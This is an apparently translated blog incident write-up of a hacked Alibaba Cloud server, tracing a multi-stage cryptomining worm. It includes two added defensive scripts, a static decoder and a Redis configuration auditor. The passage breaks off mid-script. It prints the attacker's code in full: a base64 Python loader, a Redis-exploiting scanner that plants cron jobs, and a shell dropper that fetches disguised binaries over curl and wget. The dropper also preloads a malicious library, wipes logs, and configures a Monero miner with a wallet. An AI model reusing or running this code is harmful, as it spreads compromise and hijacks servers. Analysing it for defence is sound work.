Write-up: the time our company's Alibaba Cloud server got hacked

Copyright notice: this is an original article by the blogger, released under the CC 4.0 BY-SA licence; when reposting, please include a link to the original and this notice.
本文链接: https://blog.csdn.net/FYuu95100/article/details/82351619


1. Discovering the problem

  Our company's Alibaba Cloud host raised four alerts in a row. We suspected it had been hacked and that a Python program was up to no good, so we logged in to the Alibaba Cloud console to take a look.

    Abnormal process behaviour - Linux abnormal file download
    Sensitive file tampering - suspicious modification of the Linux shared-library preload configuration file
    Malicious process (cloud scan) - mining program
    Abnormal process behaviour - Python application executing abnormal commands

2. Finding the attacker's program

  Since one of the alerts was "Abnormal process behaviour - Python application executing abnormal commands", first check whether any Python-related process is doing something it shouldn't:

ps -aux | grep python

  This turned up three related processes:

grep --color=auto python

/usr/bin/pytho -Es /usr/sbin/tuned -l -P

python -c import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))
  • The first is our own ps -aux | grep python query, a good citizen; ignore it.
  • The second runs the Python file /usr/sbin/tuned. I opened it with vim /usr/sbin/tuned and nothing about it looked wrong, but since nothing in our server software uses Python, this good citizen was killed as well.
  • The third looks like bad news at first glance; kill it first and ask questions later.

3. Analysing the attacker's program

  After killing it, let's work out what this thing actually does. From the command line, it runs a base64-encoded program through Python. Let's decode the base64 string I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz and see what it is.
  Search Baidu for an online base64 decoder, pick any one and decode it; the result is a Python program:

#coding: utf-8
import urllib
import base64

d= 'https://pastebin.com/raw/nYBpuAxT'
try:
    page=base64.b64decode(urllib.urlopen(d).read())
    exec(page)
except:
    pass
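Pasting an unknown blob into a web decoder is a habit worth dropping: the safer routine is to decode it locally and read it statically, never running it. The following script is an added example (not from the original post): it pulls the base64 argument out of the ps command line shown above, decodes it without executing anything, then lists the URLs the stage references and the calls that would download and run further code. The base64 string is the one from the page; the function names and the PS_LINE sample are mine.

```python
import ast
import base64
import re

# The base64 argument seen in the 'ps -aux | grep python' output on the page.
STAGE1_B64 = (
    "I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9w"
    "YXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUo"
    "dXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz"
)
# A constructed copy of the process command line, the way ps prints it.
PS_LINE = "python -c import base64;exec(base64.b64decode('" + STAGE1_B64 + "'))"

B64_ARG = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
URL = re.compile(r"https?://[^\s'\"]+")
# Calls whose presence in a tiny script mean "fetch something and run it".
LOADER_CALLS = {"exec", "eval", "urlopen", "b64decode", "system", "Popen"}


def blob_from_cmdline(cmdline):
    """Extract the base64 literal from a 'python -c ... b64decode(...)' command line."""
    m = B64_ARG.search(cmdline)
    return m.group(1) if m else None


def decode_stage(blob):
    """Decode one stage to text. Nothing is executed and nothing is fetched."""
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def extract_urls(source):
    """Where the next stage would be downloaded from."""
    return sorted(set(URL.findall(source)))


def loader_calls(source):
    """Statically list the download/decode/execute calls a decoded stage makes."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            func = node.func
            name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
            if name in LOADER_CALLS:
                found.add(name)
    return sorted(found)


def triage_cmdline(cmdline):
    """One-shot summary of a suspicious 'python -c' command line, or None if it has no blob."""
    blob = blob_from_cmdline(cmdline)
    if blob is None:
        return None
    source = decode_stage(blob)
    return {"source": source, "urls": extract_urls(source), "calls": loader_calls(source)}


if __name__ == "__main__":
    report = triage_cmdline(PS_LINE)
    print(report["source"])
    print("next stage from:", report["urls"])
    print("loader calls:", report["calls"])
```

decode_stage() applies equally to what this loader fetches, since the next stage is itself base64 (the blob shown further down); the point is that each layer is read, not run, and the URLs and wallet-style strings you recover along the way are the indicators worth blocking and searching for on other hosts.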

  Clearly this Python program fetches the content at https://pastebin.com/raw/nYBpuAxT, base64-decodes it and then executes it. Let's see what that content is:

IyEgL3Vzci9iaW4vZW52IHB5dGhvbgojY29kaW5nOiB1dGYtOAoKaW1wb3J0IHRocmVhZGluZwppbXBvcnQgc29ja2V0CmZyb20gcmUgaW1wb3J0IGZpbmRhbGwKaW1wb3J0IGh0dHBsaWIKCklQX0xJU1QgPSBbXQoKY2xhc3Mgc2Nhbm5lcih0aHJlYWRpbmcuVGhyZWFkKToKICAgIHRsaXN0ID0gW10KICAgIG1heHRocmVhZHMgPSAxMDAKICAgIGV2bnQgPSB0aHJlYWRpbmcuRXZlbnQoKQogICAgbGNrID0gdGhyZWFkaW5nLkxvY2soKQoKICAgIGRlZiBfX2luaXRfXyhzZWxmLGhvc3QpOgogICAgICAgIHRocmVhZGluZy5UaHJlYWQuX19pbml0X18oc2VsZikKICAgICAgICBzZWxmLmhvc3QgPSBob3N0CiAgICBkZWYgcnVuKHNlbGYpOgogICAgICAgIHRyeToKICAgICAgICAgICAgcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NUUkVBTSkKICAgICAgICAgICAgcy5zZXR0aW1lb3V0KDUpCiAgICAgICAgICAgIHMuY29ubmVjdCgoc2VsZi5ob3N0LCA2Mzc5KSkKICAgICAgICAgICAgcy5zZW5kKCdzZXQgdGlnaHRzb2Z0ICJcXG5cXG5cXG4qLzEgKiAqICogKiByb290IGN1cmwgLWZzU0wgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hiWTdwNVRifHNoXFxuXFxuXFxuIlxyXG4nKQogICAgICAgICAgICBzLnNlbmQoJ2NvbmZpZyBzZXQgZGlyIC9ldGMvY3Jvbi5kXHJcbicpCiAgICAgICAgICAgIHMuc2VuZCgnY29uZmlnIHNldCBkYmZpbGVuYW1lIHJvb3RcclxuJykKICAgICAgICAgICAgcy5zZW5kKCdzYXZlXHJcbicpCiAgICAgICAgICAgIHMuY2xvc2UoKQogICAgICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgICAgIHBhc3MKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzY2FubmVyLnRsaXN0LnJlbW92ZShzZWxmKQogICAgICAgIGlmIGxlbihzY2FubmVyLnRsaXN0KSA8IHNjYW5uZXIubWF4dGhyZWFkczoKICAgICAgICAgICAgc2Nhbm5lci5ldm50LnNldCgpCiAgICAgICAgICAgIHNjYW5uZXIuZXZudC5jbGVhcigpCiAgICAgICAgc2Nhbm5lci5sY2sucmVsZWFzZSgpCgogICAgZGVmIG5ld3RocmVhZChob3N0KToKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzYyA9IHNjYW5uZXIoaG9zdCkKICAgICAgICBzY2FubmVyLnRsaXN0LmFwcGVuZChzYykKICAgICAgICBzY2FubmVyLmxjay5yZWxlYXNlKCkKICAgICAgICBzYy5zdGFydCgpCgogICAgbmV3dGhyZWFkID0gc3RhdGljbWV0aG9kKG5ld3RocmVhZCkKCmRlZiBnZXRfaXBfbGlzdCgpOgogICAgdHJ5OgogICAgICAgIHVybCA9ICdpZGVudC5tZScKICAgICAgICBjb25uID0gaHR0cGxpYi5IVFRQQ29ubmVjdGlvbih1cmwsIHBvcnQ9ODAsIHRpbWVvdXQ9MTApCiAgICAgICAgcmVxID0gY29ubi5yZXF1ZXN0KG1ldGhvZD0nR0VUJywgdXJsPScvJywgKQogICAgICAgIHJlc3VsdCA9IGNvbm4uZ2V0cmVzcG9uc2UoKQogICAgICAgIGlwMiA9IHJlc3VsdC5yZWFkKCkKICAgICAgICBpcHMy
ID0gZmluZGFsbChyJ1xkKy5cZCsuJywgaXAyKVswXQogICAgICAgIGZvciBpIGluIHJhbmdlKDAsIDI1NSk6CiAgICAgICAgICAgIGlwX2xpc3QxID0gKGlwczIgKyAoc3RyKGkpKSkKICAgICAgICAgICAgZm9yIGcgaW4gcmFuZ2UoMCwgMjU1KToKICAgICAgICAgICAgICAgIElQX0xJU1QuYXBwZW5kKGlwX2xpc3QxICsgJy4nICsgKHN0cihnKSkpCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIHBhc3MKCmRlZiBydW5Qb3J0c2NhbigpOgogICAgZ2V0X2lwX2xpc3QoKQogICAgZm9yIGhvc3QgaW4gSVBfTElTVDoKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBpZiBsZW4oc2Nhbm5lci50bGlzdCkgPj0gc2Nhbm5lci5tYXh0aHJlYWRzOgogICAgICAgICAgICBzY2FubmVyLmxjay5yZWxlYXNlKCkKICAgICAgICAgICAgc2Nhbm5lci5ldm50LndhaXQoKQogICAgICAgIGVsc2U6CiAgICAgICAgICAgIHNjYW5uZXIubGNrLnJlbGVhc2UoKQogICAgICAgIHNjYW5uZXIubmV3dGhyZWFkKGhvc3QpCiAgICBmb3IgdCBpbiBzY2FubmVyLnRsaXN0OgogICAgICAgIHQuam9pbigpCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgcnVuUG9ydHNjYW4oKQoK

  Sure enough, base64-decoding it gives yet another Python program:

#! /usr/bin/env python
#coding: utf-8

import threading
import socket
from re import findall
import httplib

IP_LIST = []

class scanner(threading.Thread):
    tlist = []
    maxthreads = 100
    evnt = threading.Event()
    lck = threading.Lock()

    def __init__(self,host):
        threading.Thread.__init__(self)
        self.host = host
    def run(self):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(5)
            s.connect((self.host, 6379))
            s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
            s.send('config set dir /etc/cron.d\r\n')
            s.send('config set dbfilename root\r\n')
            s.send('save\r\n')
            s.close()
        except Exception:
            pass
        scanner.lck.acquire()
        scanner.tlist.remove(self)
        if len(scanner.tlist) < scanner.maxthreads:
            scanner.evnt.set()
            scanner.evnt.clear()
        scanner.lck.release()

    def newthread(host):
        scanner.lck.acquire()
        sc = scanner(host)
        scanner.tlist.append(sc)
        scanner.lck.release()
        sc.start()

    newthread = staticmethod(newthread)

def get_ip_list():
    try:
        url = 'ident.me'
        conn = httplib.HTTPConnection(url, port=80, timeout=10)
        req = conn.request(method='GET', url='/', )
        result = conn.getresponse()
        ip2 = result.read()
        ips2 = findall(r'\d+.\d+.', ip2)[0]
        for i in range(0, 255):
            ip_list1 = (ips2 + (str(i)))
            for g in range(0, 255):
                IP_LIST.append(ip_list1 + '.' + (str(g)))
    except Exception:
        pass

def runPortscan():
    get_ip_list()
    for host in IP_LIST:
        scanner.lck.acquire()
        if len(scanner.tlist) >= scanner.maxthreads:
            scanner.lck.release()
            scanner.evnt.wait()
        else:
            scanner.lck.release()
        scanner.newthread(host)
    for t in scanner.tlist:
        t.join()

if __name__ == "__main__":
    runPortscan()

  This program is a little more complicated, so let's go through it piece by piece, starting with the functions it defines.

  • get_ip_list

      Visits http://ident.me. I tried the site myself: it returns the public IP of whoever requests it, so here it hands the script the Alibaba Cloud host's IP. A regex keeps the first two octets of that IP and the script then enumerates the last two; for example, if my IP were 192.168.123.213 this produces an array IP_LIST covering 192.168.0.0 through 192.168.255.255.

  • scanner class

      This class inherits from threading.Thread. Its job is to open a socket to port 6379 on a host and send commands, chiefly set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n, a cron entry that periodically fetches the script at https://pastebin.com/raw/xbY7p5Tb and runs it.

      So the program's overall purpose is to obtain the local IP, keep its first two octets, enumerate the last two, connect to port 6379 on every address in that range and deliver the cron entry that periodically fetches and runs the script at https://pastebin.com/raw/xbY7p5Tb.
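Port 6379 is Redis, and the exchange in run() only works against an instance that accepts unauthenticated connections from the network and lets any client run CONFIG SET dir, CONFIG SET dbfilename and SAVE, so that the dump file lands in /etc/cron.d with the planted line inside it. The following added example (not part of the post) audits a redis.conf for the settings that close that path; the two sample configurations and the function names are constructed for illustration.

```python
import shlex

# Constructed sample: the exposed shape of redis.conf that the scanner on the
# page is looking for (any host on the network can connect and run CONFIG SET).
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

# Constructed sample: the same instance limited to local clients, requiring a
# password, with CONFIG renamed so clients cannot redirect the dump file.
HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
dir /var/lib/redis
"""


def parse_redis_conf(text):
    """Map each directive to the argument lists it was given (directives may repeat)."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles the quoted "" in rename-command
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text):
    """List the settings that let an unauthenticated client save an RDB file into /etc/cron.d."""
    conf = parse_redis_conf(text)
    findings = []
    # No bind directive means all interfaces, and so does an explicit wildcard.
    binds = conf.get("bind", [[]])[-1]
    if not binds or any(b.lstrip("-") in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind: reachable on all interfaces")
    # protected-mode defaults to yes on Redis 3.2 and later.
    if conf.get("protected-mode", [["yes"]])[-1] != ["yes"]:
        findings.append("protected-mode: off")
    if "requirepass" not in conf:
        findings.append("requirepass: missing, clients are not authenticated")
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.append("CONFIG: reachable, so 'dir' and 'dbfilename' can be changed by any client")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf) or ["no findings"])
```

The audit reads the file, not the running instance: values changed at runtime with CONFIG SET (as the scanner does with dir and dbfilename) only show up in CONFIG GET on the live server, which is one more reason to rename the command. Note also that protected-mode only engages when neither bind nor requirepass is set, so the three settings belong together rather than as alternatives.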


      Next, let's analyse the content of the https://pastebin.com/raw/xbY7p5Tb script:
/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/uuYVPLXd|/usr/bin/base64 -d|/bin/bash

  It fetches the content of https://pastebin.com/raw/uuYVPLXd, base64-decodes it and executes it.

  After base64-decoding, it turns out to be the following shell script, and this should be the final payload that does the real damage:

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function kills() {
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9
pkill -f biosetjenkins
pkill -f AnXqV.yam
pkill -f xmrigDaemon
pkill -f xmrigMiner
pkill -f xmrig
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f bashx
pkill -f bashg
pkill -f bashe
pkill -f bashf
pkill -f bashh
pkill -f XbashY
pkill -f libapache
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json
netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 5.196.225.222 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
y=$(ps aux | grep -v grep | grep kworkerds | wc -l )
if [ ${y} -eq 0 ];then
    netstat -anp | grep 13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
fi
}

function system() {
    if [ ! -f "/bin/httpdns" ]; then
        curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
        if [ ! -f "/bin/httpdns" ]; then
            wget  https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
        fi
        sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >> /etc/crontab
    fi

}

function top() {
    if [ ! -f "/usr/local/lib/libntp.so" ]; then
        curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
        if [ ! -f "/usr/local/lib/libntp.so" ]; then
            wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
        fi
    fi
    if [ ! -f "/etc/ld.so.preload" ]; then
        echo /usr/local/lib/libntp.so > /etc/ld.so.preload
    else
        sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >> /etc/ld.so.preload
    fi
    touch -acmr /bin/sh /etc/ld.so.preload
    touch -acmr /bin/sh /usr/local/lib/libjdk.so
    touch -acmr /bin/sh /usr/local/lib/libntp.so
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cron
}

function python() {
    nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
    touch /tmp/.tmpa
}

function echocron() {
    echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /etc/cron.d/root
    echo -e "*/30 * * * *   /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo -e "* */10 * * *   /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/crontabs/root
    touch -acmr /bin/sh /etc/cron.d/root
    touch -acmr /bin/sh /var/spool/cron/crontabs
    touch -acmr /bin/sh /var/spool/cron/root
    touch -acmr /bin/sh /var/spool/cron/crontabs/root
}

function downloadrun() {
    ps=$(netstat -anp | grep 13531 | wc -l)
    if [ ${ps} -eq 0 ];then
        if [ ! -f "/tmp/kworkerds" ]; then
            curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
            if [ ! -f "/tmp/kworkerds" ]; then
                wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
            fi
                nohup /tmp/kworkerds >/dev/null 2>&1 &
        else
            nohup /tmp/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

function downloadrunxm() {
    pm=$(netstat -anp | grep 13531 | wc -l)
    if [ ${pm} -eq 0 ];then
        if [ ! -f "/bin/config.json" ]; then
            curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
            if [ ! -f "/bin/config.json" ]; then
                wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
            fi
        fi
        if [ ! -f "/bin/kworkerds" ]; then
            curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
            if [ ! -f "/bin/kworkerds" ]; then
                wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
            fi
                nohup /bin/kworkerds >/dev/null 2>&1 &
        else
            nohup /bin/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH )
if [ ${update}x = "update"x ];then
    rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
    echocron
else
    if [ ! -f "/tmp/.tmpa" ]; then
        rm -rf /tmp/.tmp
        python
    fi
    kills
    downloadrun
    echocron
    system
    top
    sleep 10
    port=$(netstat -anp | grep 13531 | wc -l)
    if [ ${port} -eq 0 ];then
        downloadrunxm
    fi
fi
#
#

  This shell script is rather more involved; let's analyse it one piece at a time, going through the functions it defines from top to bottom.

  • kills
      Finds a long list of processes and kills them.
  • system
      Saves the content of https://pastebin.com/raw/698D7kZU, namely /usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash, to /bin/httpdns and makes it executable. https://pastebin.com/raw/kDSLjxfQ is yet another base64 blob; the shell script it decodes to is analysed further down, once this script's own functions are done.

  • top
      Saves the "image" http://thyrsi.com/t6/365/1535595427x-1404817712.jpg to /usr/local/lib/libntp.so on the server (and at the same time writes that path into /etc/ld.so.preload) and makes it executable. It looks like a picture but is really a shared library; exactly what it does is not clear yet, though my gut says nothing good. It then sets the modification times of the files it just created, /etc/ld.so.preload, /usr/local/lib/libjdk.so and /usr/local/lib/libntp.so, to match /bin/sh (truly nasty).
  • python
      Runs the Python program python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" in the background. This is the Python process we found at the very beginning (so this is where it gets started).
  • echocron
      Writes cron jobs of the form "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" into three crontab locations, /etc/cron.d/root, /var/spool/cron/root and /var/spool/cron/crontabs/root, and likewise sets their modification times to match /bin/sh.
  • downloadrun
      Saves the content of http://thyrsi.com/t6/358/1534495127x-1404764247.jpg to /tmp/kworkerds, makes it executable and runs /tmp/kworkerds in the background. This one should be an executable binary rather than a shell script, but whatever it is, it is up to no good.
  • downloadrunxm
      Saves the content of http://thyrsi.com/t6/358/1534496022x-1404764583.jpg to /bin/config.json and makes it executable; this is a JSON file:
{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "av": 0,
    "background": false,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": null,
    "donate-level": 0,
    "huge-pages": true,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 100,
    "pools": [
        {
            "url": "stratum+tcp://xmr.f2pool.com:13531",
            "user": "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "variant": 1
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": null,
    "user-agent": null,
    "watch": false
}

  I did not see where it gets used, but it presumably relates to the shared library and the executable downloaded earlier. The function also saves the content of http://thyrsi.com/t6/358/1534491798x-1404764420.jpg to /bin/kworkerds, makes it executable and then runs /tmp/kworkerds in the background.

  • Analysing the script as a whole
      With its functions covered, here is what the script does: kills first kills a pile of processes; downloadrun downloads an executable and runs it in the background; echocron writes a pile of cron jobs; system downloads a shared library; top downloads a shared library and writes it into /etc/ld.so.preload, planting a preload-type malicious shared-library backdoor; after a 10 s sleep, downloadrunxm downloads config.json and the executable /bin/kworkerds and runs it in the background.

  • With that script analysed, let's look at the script that appeared in the system function:

#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function downloadrun() {
    ps=$(netstat -anp | grep 13531 | wc -l)
    if [ ${ps} -eq 0 ];then
        if [ ! -f "/tmp/kworkerds" ]; then
            curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
            if [ ! -f "/tmp/kworkerds" ]; then
                wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
            fi
                nohup /tmp/kworkerds >/dev/null 2>&1 &
        else
            nohup /tmp/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

function downloadrunxm() {
    pm=$(netstat -anp | grep 13531 | wc -l)
    if [ ${pm} -eq 0 ];then
        if [ ! -f "/bin/config.json" ]; then
            curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
            if [ ! -f "/bin/config.json" ]; then
                wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
            fi
        fi
        if [ ! -f "/bin/kworkerds" ]; then
            curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
            if [ ! -f "/bin/kworkerds" ]; then
                wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
            fi
                nohup /bin/kworkerds >/dev/null 2>&1 &
        else
            nohup /bin/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

function init() {
